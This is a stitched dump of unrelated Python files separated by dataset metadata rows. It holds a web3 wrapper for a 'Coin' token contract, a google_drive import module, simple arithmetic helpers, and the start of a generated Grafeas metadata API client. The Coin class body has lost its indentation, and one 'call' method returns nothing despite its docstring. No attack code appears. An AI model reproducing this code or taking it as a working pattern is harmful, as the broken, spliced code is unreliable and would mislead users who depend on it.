        """Simulate the method via eth_call; chain state is not modified.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        normalized = super().normalize_tx_params(tx_params)
        self._underlying_method().call(normalized.as_dict())

    def send_transaction(self, tx_params: Optional[TxParams] = None) -> Union[HexBytes, bytes]:
        """Submit the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(normalized.as_dict())

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(normalized.as_dict())

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(normalized.as_dict())
# pylint: disable=too-many-public-methods,too-many-instance-attributes
class Coin:
"""Wrapper class for Coin Solidity contract."""
default_admin_role: DefaultAdminRoleMethod
"""Constructor-initialized instance of
:class:`DefaultAdminRoleMethod`.
"""
domain_separator: DomainSeparatorMethod
"""Constructor-initialized instance of
:class:`DomainSeparatorMethod`.
"""
minter_role: MinterRoleMethod
"""Constructor-initialized instance of
:class:`MinterRoleMethod`.
"""
pauser_role: PauserRoleMethod
"""Constructor-initialized instance of
:class:`PauserRoleMethod`.
"""
transfer_role: TransferRoleMethod
"""Constructor-initialized instance of
:class:`TransferRoleMethod`.
"""
contract_uri_: ContractUri_Method
"""Constructor-initialized instance of
:class:`ContractUri_Method`.
"""
allowance: AllowanceMethod
"""Constructor-initialized instance of
:class:`AllowanceMethod`.
"""
approve: ApproveMethod
"""Constructor-initialized instance of
:class:`ApproveMethod`.
"""
balance_of: BalanceOfMethod
"""Constructor-initialized instance of
:class:`BalanceOfMethod`.
"""
burn: BurnMethod
"""Constructor-initialized instance of
:class:`BurnMethod`.
"""
burn_from: BurnFromMethod
"""Constructor-initialized instance of
:class:`BurnFromMethod`.
"""
contract_uri: ContractUriMethod
"""Constructor-initialized instance of
:class:`ContractUriMethod`.
"""
decimals: DecimalsMethod
"""Constructor-initialized instance of
:class:`DecimalsMethod`.
"""
decrease_allowance: DecreaseAllowanceMethod
"""Constructor-initialized instance of
:class:`DecreaseAllowanceMethod`.
"""
get_role_admin: GetRoleAdminMethod
"""Constructor-initialized instance of
:class:`GetRoleAdminMethod`.
"""
get_role_member: GetRoleMemberMethod
"""Constructor-initialized instance of
:class:`GetRoleMemberMethod`.
"""
get_role_member_count: GetRoleMemberCountMethod
"""Constructor-initialized instance of
:class:`GetRoleMemberCountMethod`.
"""
grant_role: GrantRoleMethod
"""Constructor-initialized instance of
:class:`GrantRoleMethod`.
"""
has_role: HasRoleMethod
"""Constructor-initialized instance of
:class:`HasRoleMethod`.
"""
increase_allowance: IncreaseAllowanceMethod
"""Constructor-initialized instance of
:class:`IncreaseAllowanceMethod`.
"""
is_restricted_transfer: IsRestrictedTransferMethod
"""Constructor-initialized instance of
:class:`IsRestrictedTransferMethod`.
"""
is_trusted_forwarder: IsTrustedForwarderMethod
"""Constructor-initialized instance of
:class:`IsTrustedForwarderMethod`.
"""
mint: MintMethod
"""Constructor-initialized instance of
:class:`MintMethod`.
"""
name: NameMethod
"""Constructor-initialized instance of
:class:`NameMethod`.
"""
nonces: NoncesMethod
"""Constructor-initialized instance of
:class:`NoncesMethod`.
"""
pause: PauseMethod
"""Constructor-initialized instance of
:class:`PauseMethod`.
"""
paused: PausedMethod
"""Constructor-initialized instance of
:class:`PausedMethod`.
"""
permit: PermitMethod
"""Constructor-initialized instance of
:class:`PermitMethod`.
"""
renounce_role: RenounceRoleMethod
"""Constructor-initialized instance of
:class:`RenounceRoleMethod`.
"""
revoke_role: RevokeRoleMethod
"""Constructor-initialized instance of
:class:`RevokeRoleMethod`.
"""
set_contract_uri: SetContractUriMethod
"""Constructor-initialized instance of
:class:`SetContractUriMethod`.
"""
set_restricted_transfer: SetRestrictedTransferMethod
"""Constructor-initialized instance of
:class:`SetRestrictedTransferMethod`.
"""
supports_interface: SupportsInterfaceMethod
"""Constructor-initialized instance of
:class:`SupportsInterfaceMethod`.
"""
symbol: SymbolMethod
"""Constructor-initialized instance of
:class:`SymbolMethod`.
"""
total_supply: TotalSupplyMethod
"""Constructor-initialized instance of
:class:`TotalSupplyMethod`.
"""
transfer: TransferMethod
"""Constructor-initialized instance of
:class:`TransferMethod`.
"""
transfer_from: TransferFromMethod
"""Constructor-initialized instance of
:class:`TransferFromMethod`.
"""
unpause: UnpauseMethod
"""Constructor-initialized instance of
:class:`UnpauseMethod`.
"""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
validator: CoinValidator = None,
):
"""Get an instance of wrapper for smart contract.
:param web3_or_provider: Either an instance of `web3.Web3`:code: or
`web3.providers.base.BaseProvider`:code:
:param contract_address: where the contract has been deployed
:param validator: for validation of method inputs.
"""
# pylint: disable=too-many-statements
self.contract_address = contract_address
if not validator:
validator = CoinValidator(web3_or_provider, contract_address)
web3 = None
if isinstance(web3_or_provider, BaseProvider):
web3 = Web3(web3_or_provider)
elif isinstance(web3_or_provider, Web3):
web3 = web3_or_provider
else:
raise TypeError(
"Expected parameter 'web3_or_provider' to be an instance of either"
+ " Web3 or BaseProvider"
)
# if any middleware was imported, inject it
try:
MIDDLEWARE
except NameError:
pass
else:
try:
for middleware in MIDDLEWARE:
web3.middleware_onion.inject(
middleware['function'], layer=middleware['layer'],
)
except ValueError as value_error:
if value_error.args == ("You can't add the same un-named instance twice",):
pass
self._web3_eth = web3.eth
functions = self._web3_eth.contract(address=to_checksum_address(
contract_address), abi=Coin.abi()).functions
self.default_admin_role = DefaultAdminRoleMethod(
web3_or_provider, contract_address, functions.DEFAULT_ADMIN_ROLE)
self.domain_separator = DomainSeparatorMethod(
web3_or_provider, contract_address, functions.DOMAIN_SEPARATOR)
self.minter_role = MinterRoleMethod(
web3_or_provider, contract_address, functions.MINTER_ROLE)
self.pauser_role = PauserRoleMethod(
web3_or_provider, contract_address, functions.PAUSER_ROLE)
self.transfer_role = TransferRoleMethod(
web3_or_provider, contract_address, functions.TRANSFER_ROLE)
self.contract_uri_ = ContractUri_Method(
web3_or_provider, contract_address, functions._contractURI)
self.allowance = AllowanceMethod(
web3_or_provider, contract_address, functions.allowance, validator)
self.approve = ApproveMethod(
web3_or_provider, contract_address, functions.approve, validator)
self.balance_of = BalanceOfMethod(
web3_or_provider, contract_address, functions.balanceOf, validator)
self.burn = BurnMethod(
web3_or_provider, contract_address, functions.burn, validator)
self.burn_from = BurnFromMethod(
web3_or_provider, contract_address, functions.burnFrom, validator)
self.contract_uri = ContractUriMethod(
web3_or_provider, contract_address, functions.contractURI)
self.decimals = DecimalsMethod(
web3_or_provider, contract_address, functions.decimals)
self.decrease_allowance = DecreaseAllowanceMethod(
web3_or_provider, contract_address, functions.decreaseAllowance, validator)
self.get_role_admin = GetRoleAdminMethod(
web3_or_provider, contract_address, functions.getRoleAdmin, validator)
self.get_role_member = GetRoleMemberMethod(
web3_or_provider, contract_address, functions.getRoleMember, validator)
self.get_role_member_count = GetRoleMemberCountMethod(
web3_or_provider, contract_address, functions.getRoleMemberCount, validator)
self.grant_role = GrantRoleMethod(
web3_or_provider, contract_address, functions.grantRole, validator)
self.has_role = HasRoleMethod(
web3_or_provider, contract_address, functions.hasRole, validator)
self.increase_allowance = IncreaseAllowanceMethod(
web3_or_provider, contract_address, functions.increaseAllowance, validator)
self.is_restricted_transfer = IsRestrictedTransferMethod(
web3_or_provider, contract_address, functions.isRestrictedTransfer)
self.is_trusted_forwarder = IsTrustedForwarderMethod(
web3_or_provider, contract_address, functions.isTrustedForwarder, validator)
self.mint = MintMethod(
web3_or_provider, contract_address, functions.mint, validator)
self.name = NameMethod(
web3_or_provider, contract_address, functions.name)
self.nonces = NoncesMethod(
web3_or_provider, contract_address, functions.nonces, validator)
self.pause = PauseMethod(
web3_or_provider, contract_address, functions.pause)
self.paused = PausedMethod(
web3_or_provider, contract_address, functions.paused)
self.permit = PermitMethod(
web3_or_provider, contract_address, functions.permit, validator)
self.renounce_role = RenounceRoleMethod(
web3_or_provider, contract_address, functions.renounceRole, validator)
self.revoke_role = RevokeRoleMethod(
web3_or_provider, contract_address, functions.revokeRole, validator)
self.set_contract_uri = SetContractUriMethod(
web3_or_provider, contract_address, functions.setContractURI, validator)
self.set_restricted_transfer = SetRestrictedTransferMethod(
web3_or_provider, contract_address, functions.setRestrictedTransfer, validator)
self.supports_interface = SupportsInterfaceMethod(
web3_or_provider, contract_address, functions.supportsInterface, validator)
self.symbol = SymbolMethod(
web3_or_provider, contract_address, functions.symbol)
self.total_supply = TotalSupplyMethod(
web3_or_provider, contract_address, functions.totalSupply)
self.transfer = TransferMethod(
web3_or_provider, contract_address, functions.transfer, validator)
self.transfer_from = TransferFromMethod(
web3_or_provider, contract_address, functions.transferFrom, validator)
self.unpause = UnpauseMethod(
web3_or_provider, contract_address, functions.unpause)
def get_approval_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for Approval event.
:param tx_hash: hash of transaction emitting Approval event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return self._web3_eth.contract(address=to_checksum_address(self.contract_address), abi=Coin.abi()).events.Approval().processReceipt(tx_receipt)
def get_paused_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for Paused event.
:param tx_hash: hash of transaction emitting Paused event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return self._web3_eth.contract(address=to_checksum_address(self.contract_address), abi=Coin.abi()).events.Paused().processReceipt(tx_receipt)
def get_role_admin_changed_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoleAdminChanged event.
:param tx_hash: hash of transaction emitting RoleAdminChanged event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return self._web3_eth.contract(address=to_checksum_address(self.contract_address), abi=Coin.abi()).events.RoleAdminChanged().processReceipt(tx_receipt)
def get_role_granted_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoleGranted event.
:param tx_hash: hash of transaction emitting RoleGranted event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return self._web3_eth.contract(address=to_checksum_address(self.contract_address), abi=Coin.abi()).events.RoleGranted().processReceipt(tx_receipt)
def get_role_revoked_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoleRevoked event.
:param tx_hash: hash of transaction emitting RoleRevoked event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return self._web3_eth.contract(address=to_checksum_address(self.contract_address), abi=Coin.abi()).events.RoleRevoked().processReceipt(tx_receipt)
def get_transfer_event(
    self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
    """Get log entry for Transfer event.

    :param tx_hash: hash of transaction emitting Transfer event
    :returns: processed Transfer event logs from the receipt
    """
    receipt = self._web3_eth.getTransactionReceipt(tx_hash)
    contract = self._web3_eth.contract(
        address=to_checksum_address(self.contract_address),
        abi=Coin.abi(),
    )
    return contract.events.Transfer().processReceipt(receipt)
def get_unpaused_event(
    self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
    """Get log entry for Unpaused event.

    :param tx_hash: hash of transaction emitting Unpaused event
    :returns: processed Unpaused event logs from the receipt
    """
    receipt = self._web3_eth.getTransactionReceipt(tx_hash)
    contract = self._web3_eth.contract(
        address=to_checksum_address(self.contract_address),
        abi=Coin.abi(),
    )
    return contract.events.Unpaused().processReceipt(receipt)
@staticmethod
def abi():
    """Return the ABI to the underlying contract.

    :returns: the parsed contract ABI — a list of constructor/event/
        function entries as produced by the Solidity compiler.
    """
    # The ABI JSON is one very long document; it is kept as adjacent
    # string literals that Python concatenates at compile time before
    # parsing (the original single line was wrapped mid-string).
    return json.loads(
        '[{"inputs":[{"internalType":"address payable","name":"_controlCenter","type":"address"},{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"address","name":"_trustedForwarder","type":"address"},{"internalType":"string","name":"_uri","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"previousAdminRole","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"newAdminRole","type":"bytes32"}],"name":"RoleAdminChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleGranted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleRevoked","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymo'
        'us":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},{"inputs":[],"name":"DEFAULT_ADMIN_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"DOMAIN_SEPARATOR","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MINTER_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"PAUSER_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"TRANSFER_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type'
        '":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleAdmin","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"getRoleMember","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleMemberCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"grantRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"hasRole","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","t'
        'ype":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"isRestrictedTransfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"forwarder","type":"address"}],"name":"isTrustedForwarder","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"},{"internalType":"uint256","name":"deadline","type":"uint256"},{"internalType":"uint8","name":"v","type":"uint8"},{"internalType":"bytes32","name":"r","type":"bytes32"},{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"renounceRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account",'
        '"type":"address"}],"name":"revokeRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_URI","type":"string"}],"name":"setContractURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_restrictedTransfer","type":"bool"}],"name":"setRestrictedTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"unpause","outputs":[],"stateMutability":"nonpayable","type":"function"}]'  # noqa: E501 (line-too-long)
    )
# pylint: disable=too-many-lines
| 49.405359
| 9,643
| 0.690388
| 13,004
| 116,152
| 5.90972
| 0.02653
| 0.087131
| 0.049447
| 0.047469
| 0.883813
| 0.855172
| 0.83002
| 0.811191
| 0.800755
| 0.749317
| 0
| 0.00414
| 0.188985
| 116,152
| 2,350
| 9,644
| 49.426383
| 0.811669
| 0.171697
| 0
| 0.616417
| 1
| 0.000789
| 0.116007
| 0.106741
| 0
| 0
| 0
| 0
| 0.033938
| 1
| 0.175217
| false
| 0.002368
| 0.011839
| 0
| 0.384373
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ca2444cd2e76f11e970b50a9a738ca97c734bfcd
| 129
|
py
|
Python
|
sites/google_drive/__init__.py
|
GeorgOhneH/ethz-document-fetcher
|
42921e5d71698a269eb54cf9d3979e4a7d88a9cf
|
[
"MIT"
] | 15
|
2020-03-17T15:43:46.000Z
|
2022-01-08T04:23:49.000Z
|
sites/google_drive/__init__.py
|
GeorgOhneH/ethz-document-fetcher
|
42921e5d71698a269eb54cf9d3979e4a7d88a9cf
|
[
"MIT"
] | 5
|
2020-03-12T10:05:27.000Z
|
2021-03-03T16:01:47.000Z
|
sites/google_drive/__init__.py
|
GeorgOhneH/ethz-document-fetcher
|
42921e5d71698a269eb54cf9d3979e4a7d88a9cf
|
[
"MIT"
] | 2
|
2020-03-17T17:09:20.000Z
|
2020-12-28T22:59:17.000Z
|
from sites.google_drive.get_website_url import get_website_url
from sites.google_drive.producer import producer, get_folder_name
| 43
| 65
| 0.891473
| 21
| 129
| 5.095238
| 0.52381
| 0.168224
| 0.280374
| 0.373832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 129
| 2
| 66
| 64.5
| 0.891667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ca39475fcf588893a9ebfe9babeef12897abee56
| 128
|
py
|
Python
|
mathfun.py
|
cute-git/try_unit
|
d441bbb30a3a6eaa11b8a619b553a03719f96943
|
[
"Apache-2.0"
] | null | null | null |
mathfun.py
|
cute-git/try_unit
|
d441bbb30a3a6eaa11b8a619b553a03719f96943
|
[
"Apache-2.0"
] | null | null | null |
mathfun.py
|
cute-git/try_unit
|
d441bbb30a3a6eaa11b8a619b553a03719f96943
|
[
"Apache-2.0"
] | null | null | null |
def add(a, b):
    """Return the sum of *a* and *b*."""
    total = a + b
    return total
def minus(a, b):
    """Return *a* minus *b*."""
    difference = a - b
    return difference
def multi(a, b):
    """Return the product of *a* and *b*."""
    product = a * b
    return product
def divide(a, b):
    """Return *a* divided by *b* (true division).

    Raises ZeroDivisionError when *b* is zero.
    """
    quotient = a / b
    return quotient
| 10.666667
| 16
| 0.554688
| 28
| 128
| 2.535714
| 0.285714
| 0.225352
| 0.450704
| 0.507042
| 0.690141
| 0.549296
| 0
| 0
| 0
| 0
| 0
| 0
| 0.289063
| 128
| 11
| 17
| 11.636364
| 0.78022
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
ca49818502adb842b2ecff9b554afe6a7db0f322
| 60,891
|
py
|
Python
|
grafeas/api/grafeas_api.py
|
atlassian-forks/client-python
|
111cb2184324595931e42233707a58cff77cb6ec
|
[
"Apache-2.0"
] | 6
|
2018-01-22T21:54:56.000Z
|
2020-07-26T14:52:13.000Z
|
grafeas/api/grafeas_api.py
|
atlassian-forks/client-python
|
111cb2184324595931e42233707a58cff77cb6ec
|
[
"Apache-2.0"
] | 6
|
2018-07-12T12:56:16.000Z
|
2021-07-13T00:33:24.000Z
|
grafeas/api/grafeas_api.py
|
atlassian-forks/client-python
|
111cb2184324595931e42233707a58cff77cb6ec
|
[
"Apache-2.0"
] | 19
|
2018-07-12T11:08:44.000Z
|
2022-03-09T06:17:04.000Z
|
# coding: utf-8
"""
An API to insert and retrieve metadata on cloud artifacts.
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v1alpha1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from grafeas.api_client import ApiClient
class GrafeasApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Create the API facade.

    :param api_client: transport to issue requests through; a default
        ApiClient is constructed when None is given.
    """
    # Fall back to a default transport only when none was supplied.
    self.api_client = ApiClient() if api_client is None else api_client
def create_note(self, parent, body, **kwargs):  # noqa: E501
    """Creates a new `Note`.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_note(parent, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str parent: This field contains the project Id for example: \"project/{project_id} (required)
    :param ApiNote body: The Note to be inserted (required)
    :return: ApiNote
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Async: hand the request thread straight back to the caller.
        return self.create_note_with_http_info(parent, body, **kwargs)  # noqa: E501
    # Sync: unwrap the data from the full http-info response.
    (data) = self.create_note_with_http_info(parent, body, **kwargs)  # noqa: E501
    return data
def create_note_with_http_info(self, parent, body, **kwargs):  # noqa: E501
    """Creates a new `Note`.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_note_with_http_info(parent, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str parent: This field contains the project Id for example: \"project/{project_id} (required)
    :param ApiNote body: The Note to be inserted (required)
    :return: ApiNote
             If the method is called asynchronously,
             returns the request thread.
    """
    # Arguments this endpoint accepts, plus the transport-control
    # kwargs shared by every generated method.
    all_params = ['parent', 'body']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject any keyword argument the endpoint does not understand.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_note" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'parent' is set
    if ('parent' not in params or
            params['parent'] is None):
        raise ValueError("Missing the required parameter `parent` when calling `create_note`")  # noqa: E501
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `create_note`")  # noqa: E501

    collection_formats = {}

    # Split validated arguments into the path / query / header / form /
    # body buckets expected by ApiClient.call_api.
    path_params = {}
    if 'parent' in params:
        path_params['parent'] = params['parent']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/v1alpha1/{parent=projects/*}/notes', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiNote',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def create_occurrence(self, parent, body, **kwargs):  # noqa: E501
    """Creates a new `Occurrence`. Use this method to create `Occurrences` for a resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_occurrence(parent, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str parent: This field contains the project Id for example: \"projects/{project_id}\" (required)
    :param ApiOccurrence body: The occurrence to be inserted. (required)
    :return: ApiOccurrence
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Async: hand the request thread straight back to the caller.
        return self.create_occurrence_with_http_info(parent, body, **kwargs)  # noqa: E501
    # Sync: unwrap the data from the full http-info response.
